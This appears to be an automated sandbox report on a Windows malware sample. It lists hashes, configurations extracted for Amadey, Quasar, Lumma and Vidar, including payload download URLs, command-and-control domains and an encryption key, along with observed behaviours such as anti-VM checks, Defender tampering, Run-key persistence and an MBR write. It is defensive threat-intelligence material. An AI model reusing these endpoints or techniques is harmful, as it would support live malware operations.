Analysis
-
max time kernel
90s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 15:42
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
ed19338ae7b4f14a6300a82555194914
-
SHA1
c4b17e900215a704197817f8d419b40a07d687e8
-
SHA256
7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa
-
SHA512
64fc35627f5790aa025d05515e8b353ed7825f0cfaf975304933d33b219ccbf7e8e41f9f83152a0a8315568b5195dbbb669d446f6a58f5d3f3a9b9937d16ddca
-
SSDEEP
24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0hu:9TvC/MTQYxsWR7a0h
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://targett.top/dsANGt
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://advennture.top/GKsiio
https://iftargett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://apixtreev.run/LkaUz
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://cosmosyf.top/GOsznj
https://triplooqp.world/APowko
Extracted
vidar
13.3
928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 22 IoCs
resource yara_rule behavioral2/memory/4612-366-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-367-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-374-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-375-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-380-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-402-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-405-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-422-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-423-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-424-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-428-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-432-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-872-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-884-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-883-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-886-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-889-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-905-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-918-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-937-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-941-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4612-948-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Gcleaner family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/4648-152-0x000000000CD50000-0x000000000CEA4000-memory.dmp family_quasar behavioral2/memory/4648-156-0x0000000005520000-0x000000000553A000-memory.dmp family_quasar -
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/18084-42240-0x0000000000400000-0x00000000004CC000-memory.dmp family_sectoprat -
Sectoprat family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 194b034ebb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2609233090.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6a8d5b79b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eb2df5e704.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6dbecdb1f3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7866b52300.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 18 976 powershell.exe 40 4648 powershell.exe 41 3336 powershell.exe 42 4648 powershell.exe 46 4648 powershell.exe 60 1684 powershell.exe -
pid Process 4860 powershell.exe 5180 powershell.exe 784 powershell.exe 2600 powershell.exe 2500 powershell.exe 4564 powershell.exe 784 powershell.exe 696 powershell.exe 5980 powershell.exe 1220 powershell.exe 5212 powershell.exe 5624 powershell.exe 1648 powershell.exe 5288 powershell.exe 4092 powershell.exe 7164 powershell.exe 4620 powershell.exe 4736 powershell.exe 5624 powershell.exe 7352 powershell.exe 1988 powershell.exe 5680 PowerShell.exe 3928 powershell.exe 3468 powershell.exe 3008 powershell.exe 5416 powershell.exe 1220 powershell.exe 5212 powershell.exe 5624 powershell.exe 4736 powershell.exe 5980 powershell.exe 1648 powershell.exe 5288 powershell.exe 5624 powershell.exe 4092 powershell.exe 7796 powershell.exe 976 powershell.exe 4648 powershell.exe 3336 powershell.exe 1684 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 91 888 futors.exe 91 888 futors.exe 111 888 futors.exe 144 888 futors.exe 80 6112 rapes.exe 80 6112 rapes.exe 18 976 powershell.exe 41 3336 powershell.exe 60 1684 powershell.exe 178 888 futors.exe 32 6112 rapes.exe 32 6112 rapes.exe 252 6112 rapes.exe 252 6112 rapes.exe 252 6112 rapes.exe 252 6112 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2960 takeown.exe 516 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 15 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3308 chrome.exe 6676 chrome.exe 8064 msedge.exe 1996 chrome.exe 3852 msedge.exe 2324 msedge.exe 3988 chrome.exe 8008 msedge.exe 212 chrome.exe 1208 msedge.exe 1212 chrome.exe 4184 chrome.exe 4320 chrome.exe 5004 chrome.exe 12072 chrome.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6dbecdb1f3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 194b034ebb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6dbecdb1f3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7866b52300.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eb2df5e704.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eb2df5e704.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7866b52300.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 194b034ebb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2609233090.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2609233090.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a8d5b79b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a8d5b79b0.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation futors.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3798924e.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3798924e.cmd powershell.exe -
Executes dropped EXE 64 IoCs
pid Process 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 6112 rapes.exe 4192 apple.exe 5976 22.exe 1884 22.exe 1680 e214b0379a.exe 1224 TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE 2296 6lV7WRt.exe 4112 483d2fa8a0d53818306efeb32d3.exe 1040 amnew.exe 888 futors.exe 1228 rapes.exe 5888 futors.exe 3280 7866b52300.exe 4784 gron12321.exe 4564 v7942.exe 3632 alex1dskfmdsf.exe 3596 194b034ebb.exe 2320 svchost015.exe 4756 Bell_Setup16.exe 2336 Bell_Setup16.tmp 1076 Bell_Setup16.exe 468 Bell_Setup16.tmp 3632 2609233090.exe 876 6lV7WRt.exe 4964 svchost015.exe 2296 bot.exe 2348 javaruntimew.exe 1484 javaplugin_update.exe 5276 javaruntime_platform.exe 5216 javaupdater_update.exe 5596 javapluginw.exe 3504 Rm3cVPI.exe 2432 javasupport_update.exe 2688 javasupportw.exe 2140 javaservice_service.exe 932 javaplugin_service.exe 5256 javasupport.exe 1148 javaservice_service.exe 548 javaplugin_service.exe 1116 javaruntimew.exe 3620 javaupdater_update.exe 5800 javaplatform_service.exe 5964 jokererer.exe 3208 javaplatform_platform.exe 3480 javaruntime_platform.exe 1088 javasupport_update.exe 404 javasupport_platform.exe 3684 javaplatform_update.exe 5684 javaupdater_service.exe 4424 javasupport_platform.exe 2996 javaplugin_update.exe 1680 javaplatform_update.exe 4260 javaservice_service.exe 5316 javasupportw.exe 3644 javaupdater.exe 5616 javaservicew.exe 3620 javaplatform_update.exe 5520 javaplatform_platform.exe 4732 javaplatform_update.exe 3228 javaservicew.exe 2032 javaruntimew.exe 1088 javaplatform.exe 5900 javaruntime.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 7866b52300.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 194b034ebb.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 2609233090.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 6a8d5b79b0.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine eb2df5e704.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 6dbecdb1f3.exe -
Loads dropped DLL 1 IoCs
pid Process 4900 regsvr32.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 516 icacls.exe 2960 takeown.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_platform.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_platform.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javasupport_platform.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javasupport_platform.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_service.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb2df5e704.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10044090101\\eb2df5e704.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_update.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e214b0379a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369870101\\e214b0379a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369880121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 6a8d5b79b0.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00090000000242b5-141.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 6112 rapes.exe 1224 TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE 4112 483d2fa8a0d53818306efeb32d3.exe 1228 rapes.exe 3280 7866b52300.exe 3596 194b034ebb.exe 3632 2609233090.exe 1988 6a8d5b79b0.exe 5316 eb2df5e704.exe 4464 6dbecdb1f3.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2296 set thread context of 4676 2296 6lV7WRt.exe 206 PID 4784 set thread context of 4712 4784 gron12321.exe 221 PID 4564 set thread context of 4612 4564 v7942.exe 223 PID 3632 set thread context of 2980 3632 alex1dskfmdsf.exe 226 PID 3596 set thread context of 2320 3596 194b034ebb.exe 238 PID 876 set thread context of 3108 876 6lV7WRt.exe 260 PID 3632 set thread context of 4964 3632 2609233090.exe 261 PID 5964 set thread context of 5960 5964 jokererer.exe 292 PID 5316 set thread context of 4508 5316 eb2df5e704.exe 374 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE File created C:\Windows\Tasks\futors.job amnew.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5384 sc.exe 5376 sc.exe 5596 sc.exe 3908 sc.exe 2328 sc.exe 3936 sc.exe 3896 sc.exe 3684 sc.exe 2648 sc.exe 3820 sc.exe 5920 sc.exe 2088 sc.exe 1556 sc.exe 4436 sc.exe 3472 sc.exe 3892 sc.exe 1840 sc.exe 6120 sc.exe 4080 sc.exe 4092 sc.exe 6088 sc.exe 2496 sc.exe 4848 sc.exe 1292 sc.exe 5804 sc.exe 4524 sc.exe 2700 sc.exe 5796 sc.exe 1980 sc.exe 2716 sc.exe 5160 sc.exe 3112 sc.exe 4972 sc.exe 3864 sc.exe 5888 sc.exe 3136 sc.exe 1244 sc.exe 2996 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 5336 2472 WerFault.exe 539 25548 9036 WerFault.exe 591 25556 784 WerFault.exe 583 25580 4696 WerFault.exe 584 6716 548 WerFault.exe 581 8636 548 WerFault.exe 581 17948 8712 WerFault.exe 635 -
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6dbecdb1f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowerShell.exe Key opened 